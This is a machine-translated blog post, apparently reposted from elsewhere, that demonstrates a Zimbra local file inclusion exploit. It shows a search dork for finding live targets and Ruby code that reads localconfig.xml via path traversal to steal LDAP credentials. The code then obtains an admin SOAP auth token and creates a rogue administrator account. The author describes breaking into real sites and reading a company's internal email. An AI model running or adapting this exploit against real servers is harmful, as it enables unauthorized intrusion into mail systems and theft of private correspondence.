Zimbra mail management system 0 day caused by LFI

Source: Internet
Author: User

Zimbra is a company that uses many email systems and may involve many internal secrets, so it is extremely important.

This is the day: exploit-db.com that was issued on the http://www.exploit-db.com/exploits/30085/ a few days ago. The local File Inclusion Vulnerability shows localconfig. xml, and the file contains the LDAP credential. The credential is used by the API in the/service/admin/soap file to perform unauthorized operations on the mail system.


0x01 vulnerability demonstration

Search for"Make Zimbra Desktop offline", You will find many systems that use Zimbra:

We can find our target website and simply use our exp:


The prompt "Successfully" is displayed, So I log on with the new account:


You can see that there is an "Administrator console". Because this account has the administrator privilege, you can click it to manage all users. Of course, all emails from the boss of the company to the Customer Service are displayed. This is the Management Homepage:


0x02 exp running process description

Exp is written in ruby, and I didn't use python to rewrite it because it is relatively simple.

First, access the page with LFI:/res/I18nMsg, AjxMsg, ZMsg, ZmMsg, AjxKeys, ZmKeys, ZdMsg, Ajx % 20TemplateMsg. js. zgz? V = 091214175450 & skin = .. /.. /.. /.. /.. /.. /.. /.. /.. /opt/zimbra/conf/localconfig. xml % 00

req = Net::HTTP::Get.new( "/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00", { "Accept-Encoding" => "gzip", "User-Agent" => "Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.57 Safari/537.36" } )res = http.request( req )
Obtain the LDAP account and password and execute the get_auth_token function:

resbody = gz.read()part1 = resbody.gsub("\n", ' ').squeeze(' ')part2 = part1.gsub("a[", '').squeeze(' ')ldap_user = part2.match(/name=\\"zimbra_user\\">"; "<value>(.*?)<\/value>/ui)[1]ldap_pass = part2.match(/name=\\"zimbra_ldap_password\\">"; "<value>(.*?)<\/value>/ui)[1]get_auth_token(ldap_user,ldap_pass)
This function accesses/service/admin/soap and obtains the auth_key of the LDAP service in Zimbra:

def get_auth_token(user,pass)https = Net::HTTP.new( $host, 7071 )path = "/service/admin/soap"https.use_ssl = truehttps.verify_mode = OpenSSL::SSL::VERIFY_NONEbody = "<?xml version=\"1.0\" encoding=\"UTF-8\"?><env:Envelope xmlns:env=\"http://www.w3.org/2003/05/soap-envelope\" xmlns:ns1=\"urn:zimbraAdmin\" xmlns:ns2=\"urn:zimbraAdmin\"><env:Header><ns2:context/></env:Header><env:Body><ns1:AuthRequest><account by=\"name\">#{user}</account><password>#{pass}</password></ns1:AuthRequest></env:Body></env:Envelope>"data = https.post(path, body, { "Content-Type" => "application/soap+xml; charset=utf-8; action=\"urn:zimbraAdmin#AuthRequest\"" } )$auth_key = data.body.match(/<authToken>(.*)<\/authToken>/iu)[1]exploit()end
After obtaining the auth_key, call the exploit () function and use auth_key to call the request_soap_admin method of the utils class to add the administrator user. The request_soap_admin method uses the Zimbra API, the method is to submit the constructed xml containing auth_key to/service/admin/soap:
def request_soap_admin(api_call)  @request=api_call    soap_client = Net::HTTP.new( $host, 7071 )  soap_client.use_ssl = true  soap_client.verify_mode = OpenSSL::SSL::VERIFY_NONE    soap_path = "/service/admin/soap"    soap_data = "<soap:Envelope xmlns:soap=\"http://www.w3.org/2003/05/soap-envelope\"><soap:Header><context xmlns=\"urn:zimbra\"><authToken>#{$auth_key}</authToken></context></soap:Header><soap:Body>#{@request}</soap:Body></soap:Envelope>"    response = soap_client.post(soap_path, soap_data, { "Content-Type" => "application/soap+xml; charset=utf-8; action=\"urn:zimbraAdmin\"" } )    if response.body.match(/Error/)     error_res = response.body.match(/<soap:Text>(.*?)<\/soap:Text>/ui)[1]     puts "[-] Response Error"     puts "    [*] #{error_res}"     false  else     return response.body  end      end

0x03 exp download


Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.